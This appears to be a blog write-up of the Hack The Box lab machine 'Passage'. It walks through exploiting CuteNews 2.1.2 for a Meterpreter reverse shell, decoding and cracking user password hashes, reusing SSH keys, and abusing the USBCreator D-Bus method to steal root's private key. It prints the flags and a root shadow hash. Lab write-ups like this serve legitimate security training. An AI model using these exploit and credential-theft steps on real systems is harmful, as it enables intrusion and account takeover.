#reconnaissance
| nmap
So, I start as default, with nmap.
[email protected]:~/Desktop/HTB/passage$ nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206
A few seconds later I get a report:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
# Nmap 7.80 scan initiated Wed Sep 16 18:44:17 2020 as: nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206 Nmap scan report for 10.10.10.206 Host is up (0.054s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA) | 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA) |_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Passage News Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Sep 16 18:44:26 2020 -- 1 IP address (1 host up) scanned in 9.87 seconds |
Not so much, but enought. Let’s research port 80.
Making host entries:
|
1 |
echo "10.10.10.206 passage.htb" | sudo tee -a /etc/hosts |
#enumeration
| web
By footer it define as CuteNews CMS. Second, we see that I can’t fuzz url, because fail2ban.
Walking through the site, we find logging page and that the site is running CuteNews version 2.1.2.
Register here, and lets look for some exploits by searchsploit:
[email protected]:~/Desktop/HTB/passage$ searchsploit cutenews 2.1.2
and found
|
1 2 3 4 |
Exploit Title | Path CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt |
#exploitation
| cutenews-rce
As I can see in Personal options, we have possibility to upload avatar for my profile:
So, will try exploit “CuteNews 2.1.2 – ‘avatar’ Remote Code Execution”. First, we need find root directory of msf:
locate metasploit | grep "multi/"
So, go to /usr/share/metasploit-framework/modules/exploits/multi/http/, and mirror the exploit in the directory:
searchsploit -m 46698
Rename this, for example:
sudo mv 46698.rb cutenews_212_rce.rb
Also, this script have error – no comma at the end of the line, need fix it:
['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
Starting msfconsole in terminal, and configure:
msf5 > search cutenews
msf5 > use 0
msf5 exploit(multi/http/cutenews_212_rce) > set RHOSTS 10.10.10.206
msf5 exploit(multi/http/cutenews_212_rce) > set PASSWORD 123321!@#
msf5 exploit(multi/http/cutenews_212_rce) > set USERNAME user
msf5 exploit(multi/http/cutenews_212_rce) > run
Where I use my username and password. Not forget to check your LHOST 🙂
msf5 exploit(multi/http/cutenews_212_rce) > run
[*] Started reverse TCP handler on 10.10.19.30:4444 [] http://10.10.10.206:80 - CuteNews is 2.1.2
[+] Authentication was successful with user: user
[*] Trying to upload kgxhvyei.php
[+] Upload successfully.
[*] Sending stage (38288 bytes) to 10.10.10.206
[*] Meterpreter session 1 opened (10.10.19.30:4444 -> 10.10.10.206:33594) at 2020-09-16 23:43:29 -0400
meterpreter > shell
Process 2351 created.
Channel 0 created.
whoami
www-data
And do TTY: python -c "import pty; pty.spawn('/bin/bash')"
#privilege escalation
| user
Looking around, we see that machine has two users under the /home directory:
* Nadav
* Paul
And we can list the directory of Paul that contains user.txt file, but directory listing of Nadav isn’t allowed.
So, after more enumiration, I found file list with base64 in /var/www/html/CuteNews/cdata/users. Lets encode it:
for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
www-data@passage:/var/www/html/CuteNews/cdata/users$ for line in $(cat *|grep -v php);do echo -n $line | base64 -d && echo "\r"; done <tml/CuteNews/cdata/users$ for line in $(cat *|grep <for line in $(cat *|grep -v php);do echo -n $line | <v php);do echo -n $line | base64 -d && echo "\r"; d one a:1:{s:2:"id";a:1:{i:1598829833;s:6:"egre55";}}\r a:1:{s:4:"name";a:1:{s:5:"admin";a:8:{s:2:"id";s:10:"1592483047";s:4:"name";s:5:"admin";s:3:"acl";s:1:"1";s:5:"email";s:17:"[email protected]";s:4:"pass";s:64:"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1";s:3:"lts";s:10:"1592487988";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r a:1:{s:2:"id";a:1:{i:1592483281;s:9:"sid-meier";}}\r a:1:{s:2:"id";a:1:{i:1592483236;s:10:"paul-coles";}}\r a:1:{s:4:"name";a:1:{s:9:"sid-meier";a:9:{s:2:"id";s:10:"1592483281";s:4:"name";s:9:"sid-meier";s:3:"acl";s:1:"3";s:5:"email";s:15:"[email protected]";s:4:"nick";s:9:"Sid Meier";s:4:"pass";s:64:"4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88";s:3:"lts";s:10:"1592485645";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r a:1:{s:2:"id";a:1:{i:1592483047;s:5:"admin";}}\r a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"[email protected]";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}\r a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"[email protected]";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}\r a:1:{s:4:"name";a:1:{s:6:"egre55";a:11:{s:2:"id";s:10:"1598829833";s:4:"name";s:6:"egre55";s:3:"acl";s:1:"4";s:5:"email";s:15:"[email protected]";s:4:"nick";s:6:"egre55";s:4:"pass";s:64:"4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc";s:4:"more";s:60:"YToyOntzOjQ6InNpdGUiO3M6MDoiIjtzOjU6ImFib3V0IjtzOjA6IiI7fQ==";s:3:"lts";s:10:"1598834079";s:3:"ban";s:1:"0";s:6:"avatar";s:26:"avatar_egre55_spwvgujw.php";s:6:"e-hide";s:0:"";}}}\r a:1:{s:2:"id";a:1:{i:1592483309;s:9:"kim-swift";}}\r |
Lets pay attention on lines:
|
1 2 |
nadav@passage.htb:7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1 paul@passage.htb:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd |
hashid and Cyberchef said what it is sha256.
Decrypt this hashs with john: sudo john --format=Raw-SHA256 paul.hash
[email protected]:atlanta1
Here I get user.txt in console.
|
1 2 3 4 5 6 |
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul su paul Password: atlanta1 paul@passage:/var/www/html/CuteNews/cdata/users$ cat ~/user.txt cat user.txt fc95b90a67c62195dc0072fbf39d2613 |
| user2
In ~/.ssh we can found private key id_rsa. I copy him on my pc, and did:
[email protected]:/tmp$ chmod 600 paul_id_rsa
[email protected]:/tmp$ ssh -i paul_id_rsa [email protected]
Btw, user nadav in the authorized_keys in .ssh. So nadav can ssh into user paul without password. Maybe paul can do that too:
And have sucsess! 😉
| root
Here Im enumirated priveleged process:
find / -perm -u=s -type f 2>/dev/null
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
nadav@passage:~$ find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/umount /bin/ntfs-3g /bin/ping /bin/su /bin/fusermount /bin/ping6 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/xorg/Xorg.wrap /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/passwd /usr/bin/pkexec /usr/bin/newgrp /usr/bin/chfn /usr/bin/sudo /usr/bin/gpasswd /usr/bin/chsh /usr/bin/vmware-user-suid-wrapper /usr/sbin/pppd |
Among them is a sensitive program: dbus-daemon-launch-helper.
|
1 2 3 4 5 6 7 8 |
nadav@passage:~$ ps -aux | grep dbus message+ 690 0.0 0.1 44144 4948 ? Ss 21:41 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation nadav 1030 0.0 0.1 43608 4052 ? Ss 21:41 0:00 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-diaukgiUGY nadav 1077 0.0 0.0 39860 300 ? S 21:41 0:00 upstart-dbus-bridge --daemon --system --user --bus-name system nadav 1082 0.0 0.0 39860 296 ? S 21:41 0:00 upstart-dbus-bridge --daemon --session --user --bus-name session nadav 1135 0.0 0.1 42896 4056 ? S 21:41 0:00 /usr/bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3 lp 2039 0.0 0.1 81244 5640 ? S 21:46 0:00 /usr/lib/cups/notifier/dbus dbus:// nadav 2504 0.0 0.0 21292 1004 pts/19 S+ 22:34 0:00 grep --color=auto dbus |
Google it – gdbus privilege escalation
Found – https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.
Get and use root id_rsa:
[email protected]:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true
Last step – connect as root, and receive root.txt.
|
1 2 3 4 5 6 |
nadav@passage:/tmp$ ssh -i id_rsa root@passage.htb Last login: Wed Sep 16 22:07:27 2020 from 10.10.16.31 root@passage:~# cat root.txt b4de9b8a65de547814015a1d71cb2f05 root@passage:~# cat /etc/shadow | grep root root:$6$mjc8Tvgr$L56bn5KQDtOyKRdXBTL4xcmT7FVWJbds.Fo0FVc11PWliaNu5ASAxKzaEddyaYGMxGQPUNo5UpxT/nawzS8TW0:18464:0:99999:7::: |
Comments
I see something really interesting about your website so I saved to my bookmarks . Jess Merriam
Hi Dear, are you truly visiting this web site regularly, if so then you will definitely obtain good knowledge. Alfred Gafanha